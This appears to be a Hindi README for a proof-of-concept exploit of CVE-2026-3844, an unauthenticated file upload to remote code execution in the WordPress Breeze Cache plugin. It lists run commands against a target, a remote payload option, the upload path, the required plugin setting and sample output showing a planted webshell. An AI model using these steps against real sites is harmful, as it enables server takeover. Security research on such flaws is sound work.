
# CVE-2026-3844 के लिए Python प्रूफ-ऑफ-कॉन्सेप्ट WordPress Breeze Cache प्लगइन में अनधिकृत मनमाना फ़ाइल अपलोड, जो रिमोट कोड निष्पादन को सक्षम बनाता है। इसमें डिटेक्शन, एक्सप्लॉइटेशन और वेबशेल सत्यापन शामिल है।
इस रिपॉज़िटरी में WordPress Breeze Cache प्लगइन <= 2.4.4 को प्रभावित करने वाली बिना प्रमाणीकरण के मनमाना फ़ाइल अपलोड (Unauthenticated Arbitrary File Upload) भेद्यता को प्रदर्शित करने के लिए एक Python प्रूफ-ऑफ-कॉन्सेप्ट (PoC) स्क्रिप्ट शामिल है।
⚠️ यह प्रोजेक्ट केवल अधिकृत सुरक्षा परीक्षण, शैक्षिक अनुसंधान, और रक्षात्मक सत्यापन उद्देश्यों के लिए है।
यह भेद्यता Breeze Cache की gravatar कैशिंग कार्यक्षमता का दुरुपयोग करके हमलावर-नियंत्रित फ़ाइलों को WordPress कैश निर्देशिका के भीतर संग्रहीत करती है।
pycurltermcolorनिर्भरताएँ स्थापित करें:
pip install pycurl termcolor
| फ़ाइल | विवरण |
|---|---|
CVE-2026-3844.py | मुख्य PoC शोषण स्क्रिप्ट |
CVE-2026-3844.yaml | YAML टेम्पलेट/कॉन्फ़िगरेशन |
python3 CVE-2026-3844.py -u http://target.com --check-only
python3 CVE-2026-3844.py -u http://target.com
python3 CVE-2026-3844.py -u http://target.com -p https://example.com/payload.php
python3 CVE-2026-3844.py -u http://target.com -o results.txt
स्क्रिप्ट निम्नलिखित चरणों को निष्पादित करती है:
अपलोड किया गया पेलोड निम्नलिखित से सुलभ हो सकता है:
/wp-content/cache/breeze-extra/gravatars/
सफल शोषण निम्नलिखित Breeze सेटिंग सक्षम होने पर निर्भर हो सकता है:
Host Files Locally - Gravatars
यदि यह सुविधा अक्षम है, तो शोषण प्रयास विफल हो सकते हैं।
[+] Target VULNERABLE (Breeze v2.4.4)
[+] Comment posted successfully
[+] File found at: http://target.com/wp-content/cache/breeze-extra/gravatars/random.php
[+] VERIFICATION STRING FOUND - EXPLOIT SUCCESSFUL!
यह रिपॉज़िटरी निम्नलिखित के लिए प्रदान की गई है:
इस प्रोजेक्ट का उपयोग उन प्रणालियों के विरुद्ध न करें जिनके आप स्वामी नहीं हैं या जिनके परीक्षण के लिए आपके पास स्पष्ट अनुमति नहीं है।
लेखक इस प्रोजेक्ट के दुरुपयोग या क्षति के लिए कोई ज़िम्मेदारी नहीं लेता है।
वेबसाइट प्रशासकों को चाहिए:
/wp-content/cache/ की निगरानी करेंयह प्रूफ-ऑफ-कॉन्सेप्ट निम्नलिखित की मदद के लिए बनाया गया था:
असुरक्षित कैशिंग तंत्र और मनमाना फ़ाइल अपलोड से जुड़े सुरक्षा जोखिमों को समझने के लिए।
सुरक्षा अनुसंधान / शैक्षिक परियोजना